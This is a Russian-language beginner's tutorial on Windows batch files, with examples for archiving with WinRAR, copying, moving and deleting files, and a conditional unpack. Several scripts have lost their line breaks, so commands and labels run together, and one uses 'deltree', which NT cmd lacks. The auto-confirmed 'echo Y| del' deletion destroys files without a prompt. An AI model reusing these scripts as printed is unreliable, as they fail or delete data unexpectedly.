В данной статейки мы рассмотрим такую полезную вещь как «батник ». Давайте сначала дадим определение, что такое bat файл. Пакетные или batch файлы — это простые текстовые файлы, содержащие наборы команд (инструкцию ) интерпретатора и имеющие расширение bat или cmd (cmd работают только в ОС семейства NT ). Создавать и редактировать такие файлы можно при помощи обычного блокнота или любого другого текстового редактора.

Теперь Вы спросите, зачем нужно уметь писать такие бат файлы? И зачем они нужны? Попытаюсь объяснить.

Во-первых, они используются для облегчения работы, т.е. например Вам нужно постоянно выполнять какую-нибудь операцию каждый день (например, создавать архив тех или иных документов ), с помощью батника это можно автоматизировать, и Вы в этом уже не будете принимать участия.

Во-вторых, эти пакетные файлы очень мощные (если конечно уметь их писать ), т.е. Вы можете даже написать неплохую программу (я имею в виду по функционалу ). Лично мне они очень помогают в работе, и о некоторых вещах я уже просто забыл, когда это делал я в ручную.

Теперь перейдем непосредственно к основам этих батников. Как же они создаются, Вам нужно просто создать простой текстовый документ открыть его и сразу на вкладке «Файл->сохранить как », вписать вместо расширения «Текстовый документ.txt », например «Текстовый документ.bat » и сохранить, вот и получится у нас батник с расширением.bat, но он пока ничего не делает.

Для начала я приведу пример батника, который я использую у себя на работе для архивации документов.

"C:\Program Files\WinRAR\winrar.exe" a -r -dh -ed -agYYYY-mm-dd E:\arhaccounts\ d:\accounts\*.doc "C:\Program Files\WinRAR\winrar.exe" a -r -dh -ed -agYYYY-mm-dd E:\arhaccounts\ d:\accounts\*.xls "C:\Program Files\WinRAR\winrar.exe" a -r -dh -ed -agYYYY-mm-dd E:\arhaccounts\ d:\accounts\*.txt

Теперь немного расскажу, что делает этот батник. Запускается WinRar, потом идут команды винрара:

  • a — это добавить в архив;
  • -r — обрабатывать вложенные папки;
  • -dh — открывать совместно используемые файлы;
  • -ed — не добавлять пустые папки;
  • YYYY-mm-dd — добавляем к имени архива текущую дату (формат даты );
  • E:\arhaccounts\ — путь, где будет лежать конечный архив;
  • d:\accounts\*.doc — путь и маска файлов, какие нужно заархивировать.

В данном случае мы архивируем все документы Word, Excel и текстовые файлы, архивировать остальные нам не требуется. У нас архивация идет на другой диск, и мы еще копируем полученный архив на другой компьютер, для того чтобы архивы хранились и в другом кабинете. Копирование идет по сети соответственно компьютер, на который копируется архив, должен быть включен. Для этого можно использовать такую команду:

Copy E:\arhaccounts\*.rar \\namecomp\arhiv\

Примеры команд для bat файлов

Теперь рассмотрим основные команды, которые Вы можете использовать.

Если Вам нужно удалить файл пропишите следующие:

Del d:\file\test.doc

Для того чтобы удалить весь каталог пропишите:

Rd d:\file\

Вдруг Вам нужно удалять каждый раз все из какого-нибудь каталога, то используйте вот что:

Echo Y| del d:\file\

  • del d:\file\ — это как раз и есть удаление всех файлов;
  • echo Y| — команда подтверждает удаление т.к. если не прописать эту команду, то Вы увидите сообщение о подтверждение удаления – «Продолжить », и Вам нужно будет каждый раз отвечать на этот вопрос.

Сейчас давайте рассмотрим пример посложней, в котором уже выполняется условие:

@echo off "C:\Program Files\WinRAR\winrar.exe" x -O+ -IBCK d:\test\test.rar d:\test IF not EXIST d:\test\123.rar GOTO 1 IF EXIST d:\test\123.rar GOTO 2:2 "C:\Program Files\WinRAR\winrar.exe" x -O+ -IBCK d:\test\123.rar c:\ del d:\test\123.rar:1 del d:\test\test.rar end

Теперь объясняю, допустим, Вам нужно разархивировать архив test.rar, в котором будет много файлов, но если там окажется файл 123.rar его нужно будет разархивировать в корень диска C, а остальные файлы чтобы остались в том же каталоге не тронутыми.

По порядку, команда @echo off нужна, для того чтобы на экране у нас ничего не отражалось (в принципе, если не нужно можете не писать эту строку ). Далее у нас запускается винрар и распаковывает архив test.rar в папку test. Затем идет условие, если в папке test (после распаковки test.rar ) у нас не окажется файла 123.rar, то у нас просто выполнение батника переходит к строке:1 и потом просто удаляется файл test.rar за не надобностью т.к. все что нам нужно мы уже распаковали. Но если там оказывается файл 123.rar, то выполнение батника переходит к строке:2, после которой уже идет распаковка файла 123.rar в корень диска C. Другими словами у нас выполняется условие, если есть файл то делать это, если нет файла, делать вот это. Допустим, если не прописать условие в данном примере, то у нас батник выдаст ошибку, тогда когда у нас не окажется файла 123.rar в данной папке.

А сейчас рассмотрим такой пример, допустим, Вам нужно каждый раз перемещать из каталога расположенного на диске D файлы на флешку. Вы каждый раз должны будете заходить мой компьютер диск D, выбирать нужную папку, выделять все файлы из нее и вырезать, а потом только заходить на флешку и вставлять. С помощью батника это делается в один клик (с одним условием, что флешка каждый раз будет, например диском G или тем какой у Вас ). Вот пример такого батника:

Move "D:\catalog\*.doc" G:\catalognaflehe\

И все файлы с расширением doc, которые находятся в каталоге D:\catalog будут перемещаться на флешку. Теперь хочу сказать, что в батниках можно использовать сценарии (скрипты ) при помощи Windows Scripting Host и если нужно, например чтобы выводилось сообщение, после того как файлы скопированы (предыдущий пример ) вставьте вот это:

Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js echo WSHShell.Popup("Файлы Скопированы"); >> %temp%\mes.js start %temp%\mes.js deltree /y %temp%\mes.js

На самом деле про написание батников можно разговаривать много и в одну статью это, конечно же, не уместить, здесь я показал всего лишь принципы, которые используются при написании bat файлов, так сказать основу. Если Вы хотите узнать больше команд для написания батников, Вы можете легко посмотреть их, набрав в командной строке (Пуск — Выполнить – cmd ) команду help, но там, конечно же, не все команды, что можно использовать в батниках. Удачи в написание BAT файлов (батников ).